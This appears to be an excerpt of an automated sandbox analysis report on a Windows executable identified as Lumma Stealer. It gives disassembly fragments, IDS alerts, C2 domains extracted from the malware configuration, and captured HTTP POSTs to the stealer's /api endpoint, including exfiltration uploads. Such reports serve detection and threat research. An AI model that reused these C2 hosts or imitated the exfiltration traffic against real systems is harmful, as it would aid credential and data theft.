Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_009D552B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_009CC528
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	0_2_009ED557
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_009ED557
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	0_2_009C554C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	0_2_009C6544
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009DC6C3
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_009DA637
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp ecx	0_2_009EC79B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, eax	0_2_009D7797
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	0_2_009C87DF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	0_2_009C77E9
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp eax	0_2_009D6739
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	0_2_009DB763
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009DB763
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_009E3897
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009DC8B1
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	0_2_009D0817
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009C4806
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	0_2_009DB75E
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009DB75E
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009DC99C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009DC98D
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	0_2_009EA9DE
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	0_2_009D89C0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_009C6907
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov eax, edx	0_2_009CC921
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_009DC94B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	0_2_009B9967
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	0_2_009B9967
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	0_2_009B9967
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	0_2_009BEAA2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	0_2_009BDA09
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	0_2_009BDA09
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009BABA7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, ecx	0_2_009BABA7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	0_2_009D5BF7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ecx, di	0_2_009D5BF7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	0_2_009BCB7E
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov esi, eax	0_2_009D3C9B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_009D9C17
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	0_2_009CEC17
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	0_2_009EBC08
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	0_2_009E6C3B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	0_2_009ECD87
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009EAD19
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	0_2_009E6E67
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	0_2_009BDF8C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	0_2_009ECFC7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [ebx], dx	0_2_009C8F35
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_009C8F35
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_009C5F79
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009D1F77

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.12:59941 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.12:54403 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.12:52022 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.12:51301 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.12:63819 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.12:57509 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.12:56534 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.12:55902 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.12:49711 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49713 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49713 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49712 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49712 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49716 -> 104.21.66.86:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz

Source: Joe Sandbox View	IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49712 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49711 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49713 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49714 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49716 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49718 -> 104.21.66.86:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FEB7F29PSGA5I6T54LSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12838Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=00J0A6BAH4RND6Z6MT1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15073Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TX6H1HETZT0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20200Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: cashfuzysao.buzz
Source: global traffic	DNS traffic detected: DNS query: prisonyfork.buzz
Source: global traffic	DNS traffic detected: DNS query: rebuildeso.buzz
Source: global traffic	DNS traffic detected: DNS query: scentniej.buzz
Source: global traffic	DNS traffic detected: DNS query: inherineau.buzz
Source: global traffic	DNS traffic detected: DNS query: screwamusresz.buzz
Source: global traffic	DNS traffic detected: DNS query: appliacnesot.buzz
Source: global traffic	DNS traffic detected: DNS query: hummskitnj.buzz
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: H1iOI9vWfh.exe, 00000000.00000003.2479957216.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: H1iOI9vWfh.exe, 00000000.00000003.2432611733.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432536632.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2432739625.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampow~
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steam
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamsta.
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: H1iOI9vWfh.exe, 00000000.00000003.2404861908.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
